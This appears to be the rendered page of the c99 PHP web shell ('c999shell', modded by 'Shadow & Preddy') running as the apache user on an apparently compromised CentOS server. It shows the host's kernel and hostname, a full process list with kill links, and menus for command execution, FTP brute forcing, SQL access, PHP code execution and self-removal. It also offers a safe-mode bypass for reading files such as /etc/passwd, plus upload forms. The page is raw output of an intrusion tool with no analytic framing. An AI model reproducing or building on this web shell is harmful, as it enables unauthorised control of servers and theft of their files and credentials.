!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/ldap-client/lang/   drwxr-xr-x
Free 51.32 GB of 127.8 GB (40.15%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Processes:
USERPID%CPU%MEMVSZRSSTTYSTATSTARTTIMECOMMAND
root10.00.02072636?SsApr210:01init [5]KILL
root20.00.000?S<Apr210:00[migration/0]KILL
root30.00.000?SNApr210:00[ksoftirqd/0]KILL
root40.00.000?S<Apr210:00[watchdog/0]KILL
root50.00.000?S<Apr210:00[migration/1]KILL
root60.00.000?SNApr210:00[ksoftirqd/1]KILL
root70.00.000?S<Apr210:00[watchdog/1]KILL
root80.00.000?S<Apr210:00[migration/2]KILL
root90.00.000?SNApr210:00[ksoftirqd/2]KILL
root100.00.000?S<Apr210:00[watchdog/2]KILL
root110.00.000?S<Apr210:00[migration/3]KILL
root120.00.000?SNApr210:00[ksoftirqd/3]KILL
root130.00.000?S<Apr210:00[watchdog/3]KILL
root140.00.000?S<Apr210:00[migration/4]KILL
root150.00.000?SNApr210:00[ksoftirqd/4]KILL
root160.00.000?S<Apr210:00[watchdog/4]KILL
root170.00.000?S<Apr210:00[migration/5]KILL
root180.00.000?SNApr210:00[ksoftirqd/5]KILL
root190.00.000?S<Apr210:00[watchdog/5]KILL
root200.00.000?S<Apr210:00[migration/6]KILL
root210.00.000?SNApr210:00[ksoftirqd/6]KILL
root220.00.000?S<Apr210:00[watchdog/6]KILL
root230.00.000?S<Apr210:00[migration/7]KILL
root240.00.000?SNApr210:00[ksoftirqd/7]KILL
root250.00.000?S<Apr210:00[watchdog/7]KILL
root260.00.000?S<Apr210:00[events/0]KILL
root270.00.000?S<Apr210:00[events/1]KILL
root280.00.000?S<Apr210:00[events/2]KILL
root290.00.000?S<Apr210:00[events/3]KILL
root300.00.000?S<Apr210:00[events/4]KILL
root310.00.000?S<Apr210:00[events/5]KILL
root320.00.000?S<Apr210:00[events/6]KILL
root330.00.000?S<Apr210:00[events/7]KILL
root340.00.000?S<Apr210:00[khelper]KILL
root350.00.000?S<Apr210:00[kthread]KILL
root450.00.000?S<Apr210:00[kblockd/0]KILL
root460.00.000?S<Apr210:00[kblockd/1]KILL
root470.00.000?S<Apr210:00[kblockd/2]KILL
root480.00.000?S<Apr210:00[kblockd/3]KILL
root490.00.000?S<Apr210:00[kblockd/4]KILL
root500.00.000?S<Apr210:00[kblockd/5]KILL
root510.00.000?S<Apr210:00[kblockd/6]KILL
root520.00.000?S<Apr210:00[kblockd/7]KILL
root530.00.000?S<Apr210:00[kacpid]KILL
root1880.00.000?S<Apr210:00[cqueue/0]KILL
root1890.00.000?S<Apr210:00[cqueue/1]KILL
root1900.00.000?S<Apr210:00[cqueue/2]KILL
root1910.00.000?S<Apr210:00[cqueue/3]KILL
root1920.00.000?S<Apr210:00[cqueue/4]KILL
root1930.00.000?S<Apr210:00[cqueue/5]KILL
root1940.00.000?S<Apr210:00[cqueue/6]KILL
root1950.00.000?S<Apr210:00[cqueue/7]KILL
root1980.00.000?S<Apr210:00[khubd]KILL
root2000.00.000?S<Apr210:00[kseriod]KILL
root3010.00.000?SApr210:00[khungtaskd]KILL
root3040.00.000?S<Apr210:00[kswapd0]KILL
root3050.00.000?S<Apr210:00[aio/0]KILL
root3060.00.000?S<Apr210:00[aio/1]KILL
root3070.00.000?S<Apr210:00[aio/2]KILL
root3080.00.000?S<Apr210:00[aio/3]KILL
root3090.00.000?S<Apr210:00[aio/4]KILL
root3100.00.000?S<Apr210:00[aio/5]KILL
root3110.00.000?S<Apr210:00[aio/6]KILL
root3120.00.000?S<Apr210:00[aio/7]KILL
root3300.00.070682160?Ss00:250:00sshd: [accepted]KILL
root3350.30.087042668?Ss00:250:00sshd: unknown [priv]KILL
sshd3360.30.084121352?S00:250:00sshd: unknown [net]KILL
apache3380.00.02184832?R00:250:00ps -auxKILL
root4790.00.000?S<Apr210:00[kpsmoused]KILL
root5840.00.000?S<Apr210:00[mpt_poll_0]KILL
root5850.00.000?S<Apr210:00[mpt/0]KILL
root5860.00.000?S<Apr210:00[scsi_eh_0]KILL
root5960.00.000?S<Apr210:00[ata/0]KILL
root5970.00.000?S<Apr210:00[ata/1]KILL
root5980.00.000?S<Apr210:00[ata/2]KILL
root5990.00.000?S<Apr210:00[ata/3]KILL
root6000.00.000?S<Apr210:00[ata/4]KILL
root6010.00.000?S<Apr210:00[ata/5]KILL
root6020.00.000?S<Apr210:00[ata/6]KILL
root6030.00.000?S<Apr210:00[ata/7]KILL
root6040.00.000?S<Apr210:00[ata_aux]KILL
root6140.00.000?S<Apr210:00[scsi_eh_1]KILL
root6150.00.000?S<Apr210:00[scsi_eh_2]KILL
root6160.00.000?S<Apr210:00[scsi_eh_3]KILL
root6170.00.000?S<Apr210:00[scsi_eh_4]KILL
root6360.00.000?S<Apr210:00[kstriped]KILL
root6730.00.000?S<Apr210:00[ksnapd]KILL
root7120.00.000?S<Apr210:21[kjournald]KILL
root7380.00.000?S<Apr210:00[kauditd]KILL
root7710.00.02476924?S<sApr210:00/sbin/udevd -dKILL
apache16770.20.13416016152?SApr231:22/usr/sbin/httpdKILL
root21540.00.000?S<Apr210:00[kmpathd/0]KILL
root21550.00.000?S<Apr210:00[kmpathd/1]KILL
root21560.00.000?S<Apr210:00[kmpathd/2]KILL
root21570.00.000?S<Apr210:00[kmpathd/3]KILL
root21580.00.000?S<Apr210:00[kmpathd/4]KILL
root21590.00.000?S<Apr210:00[kmpathd/5]KILL
root21600.00.000?S<Apr210:00[kmpathd/6]KILL
root21610.00.000?S<Apr210:00[kmpathd/7]KILL
root21620.00.000?S<Apr210:00[kmpath_handlerd]KILL
root22320.00.000?S<Apr210:00[kjournald]KILL
root27010.00.013544780?S<slApr210:01auditdKILL
root27030.00.013100920?S<slApr210:00/sbin/audispdKILL
root27250.00.01728576?SsApr210:03syslogd -m 0KILL
root27280.00.01680404?SsApr210:00klogd -xKILL
root27890.00.000?S<Apr210:00[kondemand/0]KILL
root27900.00.000?S<Apr210:00[kondemand/1]KILL
root27910.00.000?S<Apr210:00[kondemand/2]KILL
root27920.00.000?S<Apr210:00[kondemand/3]KILL
root27930.00.000?S<Apr210:00[kondemand/4]KILL
root27940.00.000?S<Apr210:00[kondemand/5]KILL
root27950.00.000?S<Apr210:00[kondemand/6]KILL
root27990.00.000?S<Apr210:00[kondemand/7]KILL
root28140.00.02472376?SsApr210:01irqbalanceKILL
rpc28250.00.01816608?SsApr210:00portmapKILL
root28580.00.000?S<Apr210:00[rpciod/0]KILL
root28590.00.000?S<Apr210:00[rpciod/1]KILL
root28600.00.000?S<Apr210:00[rpciod/2]KILL
root28610.00.000?S<Apr210:00[rpciod/3]KILL
root28620.00.000?S<Apr210:00[rpciod/4]KILL
root28630.00.000?S<Apr210:00[rpciod/5]KILL
root28640.00.000?S<Apr210:00[rpciod/6]KILL
root28650.00.000?S<Apr210:00[rpciod/7]KILL
root28780.00.01968828?SsApr210:00rpc.statdKILL
root29020.00.05820644?SsApr210:00rpc.idmapdKILL
apache29080.20.13356015244?SApr231:26/usr/sbin/httpdKILL
dbus29170.00.02748944?SsApr210:00dbus-daemon --systemKILL
root29260.00.02172768?SsApr210:00/usr/sbin/hcidKILL
root29320.00.01748512?SsApr210:00/usr/sbin/sdpdKILL
root29740.00.000?S<Apr210:00[krfcommd]KILL
root30110.00.0231121364?SslApr210:00pcscdKILL
root30210.00.01676528?SsApr210:00/usr/sbin/acpidKILL
6830340.00.062404212?SsApr210:01haldKILL
root30350.00.031641092?SApr210:00hald-runnerKILL
6830430.00.02020812?SApr210:00hald-addon-acpi: listening on acpid socket /var/run/acpid.socketKILL
root30720.00.01916460?SsApr210:00/usr/bin/hidd --serverKILL
root30990.00.0293081372?SslApr210:00automountKILL
root31160.00.05156500?SsApr210:00./hpiodKILL
root31210.00.0134684640?SApr210:00python ./hpssd.pyKILL
root31340.00.070681068?SsApr210:05/usr/sbin/sshdKILL
root31430.00.0101442360?SsApr210:00cupsdKILL
ntp31590.00.044004396?SLsApr210:00ntpd -u ntp:ntp -p /var/run/ntpd.pid -gKILL
root31920.00.045361212?SApr210:00/bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --log-error=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid --user=mysqlKILL
mysql323910.40.617836450044?SlApr21332:39/usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --socket=/var/lib/mysql/mysql.sockKILL
root33050.00.093241916?SsApr210:00sendmail: accepting connectionsKILL
smmsp33120.00.081681528?SsApr210:00sendmail: Queue runner@01:00:00 for /var/spool/clientmqueueKILL
root33210.00.01908480?SsApr210:00gpm -m /dev/input/mice -t exps2KILL
root33330.00.0228286664?SsApr210:00/usr/sbin/httpdKILL
root33420.00.052841100?SsApr210:00crondKILL
xfs33710.00.038401648?SsApr210:00xfs -droppriv -daemonKILL
root33880.00.02268436?SsApr210:00/usr/sbin/atdKILL
avahi34150.00.026001260?SsApr210:00avahi-daemon: running [mx-ll-110-164-51-230.local]KILL
avahi34160.00.02600304?SsApr210:00avahi-daemon: chroot helperKILL
root34860.00.03516440?SApr210:00/usr/sbin/smartd -q neverKILL
root34950.00.12554810288?SNApr210:00/usr/bin/python -tt /usr/sbin/yum-updatesdKILL
root34970.00.025641128?SNApr210:00/usr/libexec/gam_serverKILL
root35100.00.11564813484?SsApr210:00/usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.confKILL
root35150.00.01664424tty1Ss+Apr210:00/sbin/mingetty tty1KILL
root35160.00.01664424tty2Ss+Apr210:00/sbin/mingetty tty2KILL
root35180.00.01664428tty3Ss+Apr210:00/sbin/mingetty tty3KILL
root35190.00.01664428tty4Ss+Apr210:00/sbin/mingetty tty4KILL
root35210.00.01664424tty5Ss+Apr210:00/sbin/mingetty tty5KILL
root35220.00.01664424tty6Ss+Apr210:00/sbin/mingetty tty6KILL
root35240.00.0155562380?SsApr210:00/usr/sbin/gdm-binary -nodaemonKILL
root36530.00.0161682232?SApr210:00/usr/sbin/gdm-binary -nodaemonKILL
root36550.00.0274964188?SlApr210:00/usr/libexec/gdm-rh-security-token-helperKILL
root36560.00.0112525196tty7Ss+Apr210:03/usr/bin/Xorg :0 -br -audit 0 -auth /var/gdm/:0.Xauth -nolisten tcp vt7KILL
gdm37080.00.13134015876?SsApr210:00/usr/libexec/gdmgreeterKILL
apache38620.20.13356415088?SApr231:24/usr/sbin/httpdKILL
apache45990.20.13433615852?SApr231:25/usr/sbin/httpdKILL
apache49430.20.13381615812?SApr231:21/usr/sbin/httpdKILL
apache50520.20.23469616892?SApr231:22/usr/sbin/httpdKILL
apache57830.20.13380415664?SApr231:18/usr/sbin/httpdKILL
apache66140.20.13360815168?SApr231:18/usr/sbin/httpdKILL
apache67540.20.13357615080?SApr231:18/usr/sbin/httpdKILL
apache70650.20.13356415216?SApr231:21/usr/sbin/httpdKILL
apache73440.20.13359615520?SApr231:24/usr/sbin/httpdKILL
apache79460.20.23436816620?SApr231:23/usr/sbin/httpdKILL
apache79840.20.13432816384?SApr231:23/usr/sbin/httpdKILL
apache80310.20.13357615556?SApr231:20/usr/sbin/httpdKILL
apache81390.20.13387215444?SApr231:21/usr/sbin/httpdKILL
apache84220.20.13433616516?SApr231:17/usr/sbin/httpdKILL
apache95840.20.13425216212?SApr231:22/usr/sbin/httpdKILL
apache96600.20.13430016348?SApr231:24/usr/sbin/httpdKILL
apache101100.20.13433215956?SApr231:19/usr/sbin/httpdKILL
root127580.00.000?SApr220:00[pdflush]KILL
root128770.00.000?SApr220:00[pdflush]KILL

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0307 ]--